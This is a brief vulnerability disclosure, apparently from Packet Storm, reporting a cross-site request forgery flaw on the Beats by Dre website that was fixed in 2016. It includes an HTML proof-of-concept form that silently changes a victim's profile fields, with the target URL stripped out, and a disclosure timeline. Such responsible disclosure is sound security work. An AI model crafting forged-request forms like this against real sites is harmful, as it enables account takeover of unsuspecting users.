Beats By Dre Cross Site Request Forgery

Type packetstorm
Reporter Aaditya Purani
Modified 2016-07-31T00:00:00


I am Aaditya Purani, and i had found an CSRF (Cross Site Request Forgery )  
on Beats by Dr.Dre which could lead to full Account Takeover and  
Information change by Just sending a Malicious crafted Link to the user.  
Proof of Concept:  
<!-- CSRF PoC - By Aaditya Purani -->  
<form method='POST' action="  
<input type="hidden" name="firstName" value="hacked" />  
<input type="hidden" name="lastName" value="hackerone" />  
<input type="hidden" name="emailAddress" value="" /> <  
input type="hidden" name="zip" value="" />  
<input type="hidden" name="phone" value="" />  
<input type="hidden" name="csrf_token" value="  
" />  
<input type="hidden" name="isEmailSubscription" value="true" />  
<input type="hidden" name="isAlreadySubscribed" value="false" />  
<input type="submit" value="Submit request" />  
Response :  
{aisCustomerSavedSuccessfullya: true, aunsubscribeStatusa: null } -> Attack  
{aisCustomerSavedSuccessfullya: false, aunsubscribeStatusa: null } ->  
Attack Unsuccessful  
Clicking on this Link, would change details of any User. I have wrote an  
Complete Blog here:  
Video PoC:  
Apple has Acknowledged me in their Hall of fame:  
October 8th 2015 a Reported  
October 23th 2015 a Triaged  
November 6th 2015 a Responded that aMatter is being investigateda  
January 18th 2016 a Fixed  
June 20th 2016 a Acknowledged